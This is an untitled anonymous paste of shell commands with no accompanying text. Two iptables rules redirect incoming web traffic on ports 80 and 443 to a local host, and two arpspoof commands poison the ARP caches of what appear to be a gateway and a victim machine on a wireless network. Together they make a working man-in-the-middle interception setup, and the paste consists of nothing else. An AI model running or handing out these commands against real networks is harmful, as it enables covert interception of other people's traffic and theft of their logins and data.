Guest User

Untitled

a guest
Jun 21st, 2018
80
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.11.29:80
  2. iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.11.29:443
  3.  
  4. arpspoof -I wlan0 -t 192.168.11.1 -r 192.168.11.15
  5. arpspoof -I wlan0 -t 192.168.11.15 -r 192.168.11.1
Add Comment
Please, Sign In to add comment